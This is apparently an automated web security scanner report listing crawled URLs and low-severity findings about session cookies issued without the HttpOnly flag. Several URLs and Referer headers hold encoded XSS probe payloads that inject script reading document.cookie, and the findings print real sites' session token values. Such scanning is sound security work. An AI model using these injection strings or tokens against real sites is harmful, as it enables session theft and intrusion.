http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/976058214/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/987149795/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/991358723/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc17c.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/search_results.php/1586088685@Right1,Right2,Right3,Top
http://opensourcematters.org/
http://opensourcematters.org/contact.html
http://opensourcematters.org/index.php
http://opensourcematters.org/register-your-group.html
http://opensourcematters.org/support-joomla.html
http://pc3.yumenetworks.com/dynamic_btx/118_12345
http://people.joomla.org/
http://people.joomla.org/groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html
http://ping.crowdscience.com/ping.js
http://pix01.revsci.net/H05525/b3/0/3/360/1/0/12DBAF7B7D9/0/0/00000000/722681440.gif
http://pix04.revsci.net/D08734/a1/0/3/0.js
http://pix04.revsci.net/D08734/a3/0/3/0.gif
http://pix04.revsci.net/G07610/b3/0/3/1003161/657607877.gif
http://pix04.revsci.net/K04491/b3/0/3/1003161/978210799.js
http://pix04.revsci.net/K04491/b3/0/3/1003161/978210799.js
http://pixel.33across.com/ps/
http://pixel.mathtag.com/event/img
http://pixel.quantserve.com/pixel
http://pixel.quantserve.com/seg/p-9dsZX-5zhUuTg.js
http://pixel.rubiconproject.com/tap.php
http://r.turn.com/r/bd
http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64
http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1
http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1
http://rcm.amazon.com/e/cm
http://rd.apmebf.com/w/pg
http://resources.joomla.org/
http://resources.joomla.org/directory/advsearch.html
http://resources.joomla.org/directory/new.html
http://resources.joomla.org/how-to-add-listings.html
http://scholar.google.com/schhp
http://scholar.google.com/scholar
http://search.aol.com/%20%20%20%20%20%20%20%20%20%20%20%20%201','','0C
http://segment-pixel.invitemedia.com/pixel
http://segment-pixel.invitemedia.com/unpixel
https://sell.autotrader.com/syc/syc_center.jsf/x22
http://shop.joomla.org/
http://shop.joomla.org/amazonca-bookstores.html
http://shop.joomla.org/amazoncom-bookstores.html
http://shop.joomla.org/amazoncouk-bookstores.html
http://shop.joomla.org/amazonde-bookstores.html
http://shop.joomla.org/amazonfr-bookstores.html
http://shop.joomla.org/faqs.html
http://shopping.tweetmeme.com/
http://simonwillison.net/2004/May/26/addLoadEvent/
http://smallbusinessnews.tweetmeme.com/
http://smp.specificmedia.com/smp/v=5
http://sourceforge.net/projects/nzbget/
http://sourceforge.net/projects/trn/
http://spongecell.com/api/events/915725/buy_tickets
http://spongecell.com/api/widgets/clickthrough/264001
http://spongecell.com/event_list
http://spongecell.com/event_page/view/915725
http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/index.php
http://stats.dailystar.com.lb/piwik.php
http://su.addthis.com/red/usync
http://tacoda.at.atwola.com/rtx/r.js
http://tags.bluekai.com/site/10
http://tags.bluekai.com/site/2981
http://titletweets.com/cupbuzz
http://top.net.mk/joomla-verzii/44-joomla-16-dojde
http://translate.google.com/
http://translate.google.com/translate_t
http://translate.googleusercontent.com/translate_c
http://trsrvr.com/x/www/delivery/ck.php
http://tweetmeme.com/
http://ugg.tweetmeme.com/
http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu
http://video.google.com/
http://video.google.com/videosearch
http://webtrends.autocheck.com/dcs1djgf3c87ozzcdiy9h9817_3i3h/dcs.gif
http://webtrends.autocheck.com/dcs1djgf3c87ozzcdiy9h9817_3i3h/dcs.gif
http://widget.mibbit.com/
http://world-cup-news.net/
http://world-cup-news.net/story/1401575902/world-cup-instant-twitter-replay-how-we-did-it-help-guardiancouk
http://world-cup-news.net/story/1402316381/2010-world-cup-south-african-man-killed-by-wife-kids-for-changing-tv-to-germany-australia-game-espn-soccernet
http://world-cup-news.net/story/1411828812/top-10-world-cup-twitter-trends-chart
http://world-cup-news.net/story/1412306061/source-fifa-may-sit-slovenia-us-referee-international-football-yahoo-sports
http://world-cup-news.net/story/1416869398/bbc-sport-football-world-cuo-2010-nicolas-anelka-misses-france-training
http://world-cup-news.net/story/1424331193/bbc-sport-football-capello-to-quit-if-england-fail-to-reach-last-16
http://world-cup-news.net/story/1427486259/the-best-website-designs-of-the-2010-world-cup-webdesigner-depot
http://world-cup-news.net/story/1445743829/usa-vs-algeria-world-cup-match-could-set-new-internet-traffic-record
http://world-cup-news.net/story/1446425875/algeria-star-slaps-female-reporter-international-football-yahoo-sports
http://world-cup-news.net/story/1446502910/fifacom-australia-serbia-the-matches-of-2010-fifa-world-cup-south-africa
http://www.addthis.com/bookmark.php
http://www.addthis.com/feed.php
http://www.aerotrader.com/
http://www.alistapart.com/articles/alternate/
http://www.apture.com/js/apture.js
http://www.atvtraderonline.com/
http://www.autobytel.com/auto-insurance-quotes.htm
http://www.autobytel.com/car-advice.htm
http://www.autobytel.com/car-blog.htm
http://www.autobytel.com/car-dealers.htm
http://www.autobytel.com/car-financing.htm
http://www.autobytel.com/car-incentives.htm
http://www.autobytel.com/car-news.htm
http://www.autobytel.com/car-pictures.htm
http://www.autobytel.com/car-reviews.htm
http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator
http://www.autobytel.com/content/buy/warranty/index.cfm
http://www.autobytel.com/content/home/help/index.cfm
http://www.autobytel.com/content/home/help/index.cfm/action/about
http://www.autobytel.com/content/home/help/index.cfm/action/contact
http://www.autobytel.com/content/home/help/index.cfm/action/privacy
http://www.autobytel.com/content/home/help/index.cfm/action/terms
http://www.autobytel.com/content/home/index.cfm
http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/
http://www.autobytel.com/content/research/article/index.cfm
http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show
http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide
http://www.autobytel.com/content/research/comparison/index.cfm
http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI
http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1
http://www.autobytel.com/content/shared/modProfile/index.cfm
http://www.autobytel.com/new-car-price-quotes.htm
http://www.autobytel.com/new-cars.htm
http://www.autobytel.com/used-cars.htm
http://www.autobytel.com/x22
http://www.automotive.com/x22
http://www.autotrader.com/ajax/backButtonFix.jsp
http://www.autotrader.com/cms/img/homepage/autoMercado_logo.gif
http://www.autotrader.com/fyc/index.jsp/x22
http://www.autotrader.com/fyc/index.jsp/x22
http://www.autotrader.com/hornav/trader/index.jsp/x22
http://www.autotrader.com/hornav/trader/index.jsp/x22
http://www.autotrader.com/inc/ad.html
http://www.autotrader.com/no_cache/ac/trader_clicks_0001_nocount.asis
http://www.autotrader.com/no_cache/ac/trader_clicks_0002_nocount.asis
http://www.autotrader.com/no_cache/ac/trader_clicks_0005_nocount.asis
http://www.autotrader.com/no_cache/ac/trader_clicks_0006_nocount.asis
http://www.autotrader.com/no_cache/ac/trader_clicks_0009_nocount.asis
http://www.autotrader.com/no_cache/ac/trader_clicks_0016_nocount.asis
http://www.autotrader.com/research/certified-cars/index.jsp/x22
http://www.autotrader.com/research/certified-cars/index.jsp/x22
http://www.autotrader.com/research/index.jsp/x22
http://www.autotrader.com/research/index.jsp/x22
http://www.autotrader.com/research/new-cars/index.jsp/x22
http://www.autotrader.com/research/new-cars/index.jsp/x22
http://www.autotrader.com/research/used-cars/index.jsp/x22
http://www.autotrader.com/research/used-cars/index.jsp/x22
http://www.autotrader.com/x22
http://www.autotrader.com/x22
http://www.autotrader.com/x22/x3e/x3cli
http://www.autotrader.com/x22/x3e/x3cli
http://www.autotraderclassics.com/find/index.xhtml/x22
http://www.autotraderclassics.com/x22
http://www.barcelonaworldrace.org/
http://www.barcelonaworldrace.org/en/actualite/breves
http://www.barcelonaworldrace.org/en/actualite/breves/detail/an-explanation-from-jp-estrella-damm-ready-to-pounce-0-8072
http://www.blip.tv/about/
http://www.blip.tv/blogs/
http://www.blip.tv/prefs/
http://www.bmwusa.com/Standard/Content/Vehicles/2011/M/MExplore.aspx
https://www.bmwusa.com/ScriptResource.axd
https://www.bmwusa.com/Secured/Content/Forms/Login.aspx
https://www.bmwusa.com/Secured/FrameCheck.aspx
https://www.bmwusa.com/Secured/NaN
https://www.bmwusa.com/WebResource.axd
https://www.bmwusa.com/jsenvconst.ashx
http://www.boattrader.com/
http://www.care2.com/news/news_post.html
http://www.cars.com/x22
http://www.cloudaccess.net/
http://www.cloudaccess.net/about-us.html
http://www.cloudaccess.net/billing-policy.html
http://www.cloudaccess.net/client-login.html
http://www.cloudaccess.net/cloudaccess-partner-program.html
http://www.cloudaccess.net/constant-contact-integration.html
http://www.cloudaccess.net/contact-us.html
http://www.cloudaccess.net/contact-us/474.html
http://www.cloudaccess.net/copyright-policy.html
http://www.cloudaccess.net/flipphoto-pro.html
http://www.cloudaccess.net/forum.html
http://www.cloudaccess.net/investor-relations.html
http://www.cloudaccess.net/joomla-developer-tools.html
http://www.cloudaccess.net/joomla-features-tour.html
http://www.cloudaccess.net/joomla-service-and-support.html
http://www.cloudaccess.net/joomla-support-and-hosting-support.html
http://www.cloudaccess.net/joomla-templates-and-themes.html
http://www.cloudaccess.net/joomla-training-videos.html
http://www.cloudaccess.net/meet-our-team.html
http://www.cloudaccess.net/network-report.html
http://www.cloudaccess.net/network-sla.html
http://www.cloudaccess.net/pricing.html
http://www.cloudaccess.net/privacy-policy.html
http://www.cloudaccess.net/support-sla.html
http://www.cloudaccess.net/terms-of-service.html
http://www.cloudaccess.net/trial.html
https://www.cloudaccess.net/copyright-policy.html
https://www.cloudaccess.net/network-report.html
https://www.cloudaccess.net/network-sla.html
https://www.cloudaccess.net/privacy-policy.html
https://www.cloudaccess.net/support-sla.html
https://www.cloudaccess.net/terms-of-service.html
http://www.cycletrader.com/
http://www.dedipower.com/
http://www.digitalia.be/
http://www.dynamicdrive.com/forums/showthread.php
http://www.elmundo.es/
http://www.employmentguide.com/
http://www.eraser.ee/uudised/joomla/329-joomla-16-on-saabunud.html
http://www.facebook.com/
http://www.facebook.com/%s
http://www.facebook.com/2008/fbml
http://www.facebook.com/7NEWS
http://www.facebook.com/LIMEprpromo
http://www.facebook.com/abid.bahloul
http://www.facebook.com/apps/application.php
http://www.facebook.com/beirutcityguide
http://www.facebook.com/home.php
http://www.facebook.com/miofeghali
http://www.facebook.com/pages/Traverse-City-MI/CloudAccessnet/116931806748
http://www.facebook.com/paty.kfoury
http://www.facebook.com/profile.php
http://www.facebook.com/sharer.php
http://www.flickr.com/photos/aubalumni/4688630122/x22
http://www.flickr.com/photos/favoritltd/4795390303/
http://www.flickr.com/photos/favoritltd/4795390991/
http://www.flickr.com/photos/favoritltd/4795392149/
http://www.flickr.com/photos/favoritltd/4795392811/
http://www.flickr.com/photos/favoritltd/4796022554/
http://www.flickr.com/photos/favoritltd/4796024690/
http://www.google.com/calendar/embed
http://www.google.com/calendar/event
http://www.google.com/finance
http://www.google.com/setprefs
http://www.google.com/url
https://www.google.com/accounts/Login
https://www.google.com/accounts/ServiceLogin
http://www.goozernation.com/video-games/index.php/news/351-video-games-qcreate-mental-health-problemsq
http://www.greenmaven.com/
http://www.groupon.com/washington-dc/subscribe
http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x22
http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp
http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared
http://www.id-joomla.com/berita-joomla/648-joomla-16-telah-datang
http://www.jgerman.de/news/projekt/joomla-16-ist-fertig.html
http://www.jobalot.com/
http://www.joomla-serbia.com/
http://www.joomla.cat/notes-mainmenu-2/1-darreres/2083-el-joomla-16-ja-es-aqui
http://www.joomla.fr/les-news-joomla/13-news-officielles/1032-joomla-1-6
http://www.joomla.gr/--46/93-joomla-1-6/447-joomla-new-1-6
http://www.joomla.it/notizie/4691-e-arrivato-joomlar-160.html
http://www.joomla.org/
http://www.joomla.org/16/
http://www.joomla.org.hu/joomla/46-kiadasok/272-megerkezett-a-joomla-16.html
http://www.joomla.org.tw/news/joomla-official-news/163-joomla16-arrived
http://www.joomla.ro/component/content/article/1-lansari/55-a-aparut-joomla-16
http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html
http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html
http://www.joomlainorge.no/nyheter/joomla/552-joomlar-16-er-utgitt
http://www.joomlapt.com/comunidade-joomlapt/139-joomla-16-ja-chegou.html
http://www.jt.gen.tr/makaleler/46-joomla-16.html
http://www.kwitco.com/
http://www.lexus.com/
http://www.linkagogo.com/go/AddNoPopup
http://www.lithuanianjoomla.com/7-joomla-naujienos/70-joomla-160-isleista.html
http://www.livejournal.com/update.bml
http://www.lynda.com/landing/softwaretraining.aspx
http://www.microsoft.com/web/joomla/
http://www.myride.com/
http://www.newsvine.com/_wine/save
http://www.nexternal.com/ecommerce/joomla-shopping-cart.asp
http://www.noreastermagazine.com/
http://www.omniture.com/
http://www.outdoorphotographer.com/
https://www.paypal.com/cgi-bin/webscr
http://www.playshakespeare.com/
http://www.pwc-traderonline.com/
http://www.regattaregatta.com/
http://www.rochenhost.com/
http://www.rochenhost.com/joomla-hosting
http://www.rockettheme.com/
http://www.rvtraderonline.com/
http://www.snowmobiletraderonline.com/
http://www.soundingsonline.com/
http://www.soundingsonline.com/archives
http://www.staples.com/ecoeasy
http://www.stumbleupon.com/submit
http://www.thepointebrodiecreek.com/
http://www.tradeonlytoday.com/
http://www.tuenti.com/
https://www.tuenti.com/
http://www.usaca.info/
http://www.veoh.com/videodetails2.swf
http://www.walnecks.com/
http://www.wireless.att.com/learn/articles-resources/community-support/recycling.jsp
http://www.x64bitdownload.com/64-bit-archive-downloads.html
http://www.x64bitdownload.com/64-bit-assembling-downloads.html
http://www.x64bitdownload.com/64-bit-atom-downloads.html
http://www.x64bitdownload.com/64-bit-audio-downloads.html
http://www.x64bitdownload.com/64-bit-automatic-downloads.html
http://www.x64bitdownload.com/64-bit-autoposter-downloads.html
http://www.x64bitdownload.com/64-bit-binaries-downloads.html
http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html
http://www.x64bitdownload.com/64-bit-binary-downloads.html
http://www.x64bitdownload.com/64-bit-board-downloads.html
http://www.x64bitdownload.com/64-bit-boards-downloads.html
http://www.x64bitdownload.com/64-bit-client-downloads.html
http://www.x64bitdownload.com/64-bit-commander-downloads.html
http://www.x64bitdownload.com/64-bit-community-downloads.html
http://www.x64bitdownload.com/64-bit-complex-downloads.html
http://www.x64bitdownload.com/64-bit-conference-downloads.html
http://www.x64bitdownload.com/64-bit-cross-downloads.html
http://www.x64bitdownload.com/64-bit-download-downloads.html
http://www.x64bitdownload.com/64-bit-downloader-downloads.html
http://www.x64bitdownload.com/64-bit-explorer-downloads.html
http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html
http://www.x64bitdownload.com/64-bit-fast-download-downloads.html
http://www.x64bitdownload.com/64-bit-feed-downloads.html
http://www.x64bitdownload.com/64-bit-feedreader-downloads.html
http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html
http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html
http://www.x64bitdownload.com/64-bit-firefox-downloads.html
http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-forum-downloads.html
http://www.x64bitdownload.com/64-bit-forums-downloads.html
http://www.x64bitdownload.com/64-bit-google-groups-downloads.html
http://www.x64bitdownload.com/64-bit-grabber-downloads.html
http://www.x64bitdownload.com/64-bit-group-downloads.html
http://www.x64bitdownload.com/64-bit-groups-downloads.html
http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html
http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html
http://www.x64bitdownload.com/64-bit-images-downloads.html
http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-internet-downloads.html
http://www.x64bitdownload.com/64-bit-kill-file-downloads.html
http://www.x64bitdownload.com/64-bit-killfile-downloads.html
http://www.x64bitdownload.com/64-bit-mp3-downloads.html
http://www.x64bitdownload.com/64-bit-multimedia-downloads.html
http://www.x64bitdownload.com/64-bit-multipart-downloads.html
http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-news-downloads.html
http://www.x64bitdownload.com/64-bit-news-reader-downloads.html
http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html
http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html
http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html
http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-newsreader-downloads.html
http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-nntp-downloads.html
http://www.x64bitdownload.com/64-bit-nzb-downloads.html
http://www.x64bitdownload.com/64-bit-ozum-downloads.html
http://www.x64bitdownload.com/64-bit-par-downloads.html
http://www.x64bitdownload.com/64-bit-podcast-downloads.html
http://www.x64bitdownload.com/64-bit-posts-downloads.html
http://www.x64bitdownload.com/64-bit-rar-downloads.html
http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-reader-downloads.html
http://www.x64bitdownload.com/64-bit-reading-downloads.html
http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-rss-client-downloads.html
http://www.x64bitdownload.com/64-bit-rss-downloads.html
http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html
http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html
http://www.x64bitdownload.com/64-bit-search-downloads.html
http://www.x64bitdownload.com/64-bit-ssl-downloads.html
http://www.x64bitdownload.com/64-bit-synchronization-downloads.html
http://www.x64bitdownload.com/64-bit-synchronize-downloads.html
http://www.x64bitdownload.com/64-bit-topic-downloads.html
http://www.x64bitdownload.com/64-bit-troll-downloads.html
http://www.x64bitdownload.com/64-bit-troll-killer-downloads.html
http://www.x64bitdownload.com/64-bit-trollkiller-downloads.html
http://www.x64bitdownload.com/64-bit-use-next-downloads.html
http://www.x64bitdownload.com/64-bit-usenet-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-usenet-downloads.html
http://www.x64bitdownload.com/64-bit-usenet-search-engine-downloads.html
http://www.x64bitdownload.com/64-bit-usenext-downloads.html
http://www.x64bitdownload.com/64-bit-video-downloads.html
http://www.x64bitdownload.com/64-bit-xpat-downloads.html
http://www.x64bitdownload.com/64-bit-yenc-downloads.html
http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html
http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html
http://www.yencode.org/
http://www.yootheme.com/license
http://www.youtube.com/
http://www.youtube.com/results
http://www.youtube.com/subscribe_widget
http://www.zazzle.com/netlingo
http://www.zazzle.com/netlingo
http://www1.whdh.com/
http://xads.zedo.com/ads3/a
http://xfactor.tweetmeme.com/
http://yoga.tweetmeme.com/
http://youtube.tweetmeme.com/

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

14.1. http://7newsboston.disqus.com/thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://7newsboston.disqus.com
Path:	/thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sessionid=fc05e21a91a616ef2d73501d05b7cdf8; Domain=.disqus.com; expires=Mon, 07-Feb-2011 22:27:59 GMT; Max-Age=1209600; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.2. https://acc.newsguy.com/a/memsubmit.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://acc.newsguy.com
Path:	/a/memsubmit.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

session-id=0e2d0ec1250f132ad68e906f4c3629b3; path=/
DIGEST=9X4cj3HMWW55_p6OOm9h6em4opp0oWW0L4d3d945a; path=/; domain=.newsguy.com;

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.3. http://advertising.aol.com/privacy/advertisingcom/opt-out previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://advertising.aol.com
Path:	/privacy/advertisingcom/opt-out

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSff329d810a46b3a1bf645141daed34cf=93735d5185af6eada5ab3cadef0ec891; expires=Thu, 17 Feb 2011 02:03:09 GMT; path=/; domain=.advertising.aol.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy/advertisingcom/opt-out HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:29:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=93735d5185af6eada5ab3cadef0ec891; expires=Thu, 17 Feb 2011 02:03:09 GMT; path=/; domain=.advertising.aol.com
Last-Modified: Mon, 24 Jan 2011 21:11:57 GMT
ETag: "49e354d4a7310059e90b8f5c479565dd"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 31687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...

14.4. http://affiliate.kickapps.com/service/getWidget.kickAction previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://affiliate.kickapps.com
Path:	/service/getWidget.kickAction

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=2FD2E042C1D527E54DE4C7AE3124B7E1; Path=/
as=94274; Expires=Wed, 26-Jan-2011 02:23:05 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /service/getWidget.kickAction?as=94274&revision=14&widgetId=160832 HTTP/1.1
Host: affiliate.kickapps.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerapp_server_pool=1739565248.47135.0000

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2FD2E042C1D527E54DE4C7AE3124B7E1; Path=/
Set-Cookie: as=94274; Expires=Wed, 26-Jan-2011 02:23:05 GMT; Path=/
x-appserver: app1
Location: http://cdnserve.a-widget.com/service/getWidget2.kickAction?revision=14&as=94274&widgetId=160832
X-Cnection: close
Content-Length: 0
Date: Tue, 25 Jan 2011 02:23:05 GMT

14.5. https://billing.cloudaccess.net/cart.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://billing.cloudaccess.net
Path:	/cart.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=nlahukcb6v56uitl53v0m81g20; expires=Sat, 05-Mar-2011 13:56:09 GMT; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.6. http://cdn.beirut.com/GetImage.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://cdn.beirut.com
Path:	/GetImage.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=jstce2dl1tbrnkoho5s4o0q4h2; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /GetImage.php?imgtype=mainpicture&contacttype=event&typeid=16&contactid=5910&size=240x173 HTTP/1.1
Host: cdn.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
